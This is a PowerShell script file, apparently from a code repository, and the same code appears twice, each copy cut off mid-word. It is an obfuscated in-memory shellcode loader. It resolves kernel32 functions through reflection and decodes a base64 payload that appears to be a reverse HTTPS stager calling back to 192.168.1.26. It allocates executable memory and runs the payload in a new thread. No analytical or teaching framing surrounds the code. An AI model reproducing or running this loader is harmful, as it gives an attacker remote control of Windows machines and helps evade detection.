anonymouss314/ghjdghdzg.ps1

## ghjdghdzg.ps1
function q6hq {
        Param ($hQ_cR, $wgg7)
        $gB9 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

        return $gB9.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($gB9.GetMethod('GetModuleHandle')).Invoke($null, @($hQ_cR)))), $wgg7))
}

function ghWp {
        Param (
                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $i9INv,
                [Parameter(Position = 1)] [Type] $acV = [Void]
        )

        $sRWH2 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $sRWH2.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $i9INv).SetImplementationFlags('Runtime, Managed')
        $sRWH2.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $acV, $i9INv).SetImplementationFlags('Runtime, Managed')

        return $sRWH2.CreateType()
}

[Byte[]]$fR = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NT6D4AAABNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvAGg6Vnmn/9VTU2oDU1NouwEAAOhzAQAAL18tTTVSTnJXZVV5STM0bmUxU3hKTEFXbXhERXlTNjFHbklRVE5OUWRScDdKVkxXdmlTcVZFeW5EeU1RVUZxNjd4dUE1UjFKVkJVc1Jtd0psTEhOcTdVemptaDZtQS1zc1lDQi1haGN0ZlMyWHlWMWd4TDVCWXU0enBfclo1WnZURVFBcXlLVXg3Y21NSEhvVnBzNUZHSzRIdndYdkQ2dmJkTktQN19hSUloMVFtSzhsSVRxOXJLYWhBYzdOOWJWaU1GZHZhODNQT0tmUkZqcEc4Vkl1d3ByYklSZnE1OHFiZWkAUGhXiZ/G/9WJxlNoADLghFNTU1dTVmjrVS47/9WWagpfaIAzAACJ4GoEUGofVmh1Rp6G/9VTU1NTVmgtBhh7/9WFwHUUaIgTAABoRPA14P/VT3XN6EkAAABqQGgAEAAAaAAAQABTaFikU+X/1ZNTU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0z4sHAcOFwHXlWMNf6Gv///8xOTIuMTY4LjEuMjYAu/C1olZqAFP/1Q==")

$ls = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q6hq kernel32.dll VirtualAlloc), (ghWp @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $fR.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($fR, 0, $ls, $fR.length)

$i6Mr0 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q6hq kernel32.dll CreateThread), (ghWp @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$ls,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q6hq kernel32.dll WaitForS
	function q6hq {
	Param ($hQ_cR, $wgg7)
	$gB9 = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

	return $gB9.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($gB9.GetMethod('GetModuleHandle')).Invoke($null, @($hQ_cR)))), $wgg7))
	}

	function ghWp {
	Param (
	[Parameter(Position = 0, Mandatory = $True)] [Type[]] $i9INv,
	[Parameter(Position = 1)] [Type] $acV = [Void]
	)

	$sRWH2 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$sRWH2.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $i9INv).SetImplementationFlags('Runtime, Managed')
	$sRWH2.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $acV, $i9INv).SetImplementationFlags('Runtime, Managed')

	return $sRWH2.CreateType()
	}

	[Byte[]]$fR = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NT6D4AAABNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvAGg6Vnmn/9VTU2oDU1NouwEAAOhzAQAAL18tTTVSTnJXZVV5STM0bmUxU3hKTEFXbXhERXlTNjFHbklRVE5OUWRScDdKVkxXdmlTcVZFeW5EeU1RVUZxNjd4dUE1UjFKVkJVc1Jtd0psTEhOcTdVemptaDZtQS1zc1lDQi1haGN0ZlMyWHlWMWd4TDVCWXU0enBfclo1WnZURVFBcXlLVXg3Y21NSEhvVnBzNUZHSzRIdndYdkQ2dmJkTktQN19hSUloMVFtSzhsSVRxOXJLYWhBYzdOOWJWaU1GZHZhODNQT0tmUkZqcEc4Vkl1d3ByYklSZnE1OHFiZWkAUGhXiZ/G/9WJxlNoADLghFNTU1dTVmjrVS47/9WWagpfaIAzAACJ4GoEUGofVmh1Rp6G/9VTU1NTVmgtBhh7/9WFwHUUaIgTAABoRPA14P/VT3XN6EkAAABqQGgAEAAAaAAAQABTaFikU+X/1ZNTU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0z4sHAcOFwHXlWMNf6Gv///8xOTIuMTY4LjEuMjYAu/C1olZqAFP/1Q==")

	$ls = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q6hq kernel32.dll VirtualAlloc), (ghWp @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $fR.Length,0x3000, 0x40)
	[System.Runtime.InteropServices.Marshal]::Copy($fR, 0, $ls, $fR.length)

	$i6Mr0 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q6hq kernel32.dll CreateThread), (ghWp @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$ls,[IntPtr]::Zero,0,[IntPtr]::Zero)
	[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((q6hq kernel32.dll WaitForS